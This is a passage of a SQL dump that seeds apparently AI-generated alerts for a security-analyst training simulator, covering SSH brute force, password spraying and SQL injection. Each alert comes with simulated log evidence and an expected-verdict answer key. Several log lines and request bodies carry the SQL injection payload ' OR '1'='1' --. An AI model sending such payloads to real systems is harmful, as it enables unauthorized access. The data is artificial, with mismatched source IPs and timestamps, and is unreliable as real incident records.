1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1673, 'SSH Brute Force Detected from Domestic IP', 'medium', 'Splunk', 'A domestic IP address was flagged for making multiple failed SSH login attempts to a server, indicating a possible brute force.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T19:05:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.0.50\",\"username\":\"root\",\"hostname\":\"domestic-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for unusual activity, but not malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP activity was suspicious but not confirmed malicious, leading to the conclusion of a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1674, 'Unusual Brute Force Activity from Known Good IP', 'low', 'Elastic SIEM', 'Failed login attempts detected from an IP address previously identified as benign, suggesting potential misconfiguration.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.140\",\"dst_ip\":\"10.0.0.60\",\"username\":\"admin\",\"hostname\":\"test-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.140\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s clean OSINT result and previous benign reputation indicate a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1675, 'Unsuccessful Password Spraying Attempt', 'medium', 'Wazuh', 'An IP address was observed making multiple unsuccessful login attempts across several accounts, potentially indicating a password spraying attempt.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T21:40:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.77\",\"dst_ip\":\"192.168.1.75\",\"username\":\"test\",\"hostname\":\"web-auth\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged due to abnormal activities but not confirmed malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"test\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Absence of a confirmed-malicious verdict does not by itself make the activity benign; the false-positive disposition here rests on every attempt having failed against the test account from a source with no confirmed abuse history. Record the source IP and confirm that no account lockouts occurred before closing, since a failed spray is still a reconnaissance signal. Note that the auth.log evidence cites 192.168.1.50 while the alert lists 198.51.100.77 as the source; reconcile the two before deciding.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1676, 'SQL Injection Attempt Detected on Public-Facing Web Server', 'critical', 'Splunk', 'SQL injection attempt detected in a web request targeting a public-facing web server.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:50:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.60\",\"dst_ip\":\"10.0.0.80\",\"username\":\"none\",\"hostname\":\"public-web\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The malicious payload and IP reputation confirm the SQL injection attempt. The access-log evidence shows 403 responses, so these requests were blocked; check the same source for any 200 responses before treating the web server as compromised. Note that the access-log message attributes the requests to 203.0.113.55 while the alert lists 192.0.2.60 as the source; reconcile the two before applying a block.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1677, 'Brute Force Attempt from Internal IP', 'low', 'Azure Sentinel', 'Detected several failed SSH login attempts from an internal IP address, possibly due to misconfigured scripts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:15:20Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.90\",\"username\":\"root\",\"hostname\":\"internal-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, likely misconfigured script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"An internal source repeatedly failing against root is consistent with a misconfigured script, which supports a false-positive disposition, but intent cannot be read from the logs alone; identify the process on 192.168.1.100 that is making the attempts before closing, since the same pattern from a compromised internal host would be lateral movement. Note that the auth.log evidence cites 192.168.1.50 while the alert lists 192.168.1.100 as the source; reconcile the two before deciding.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
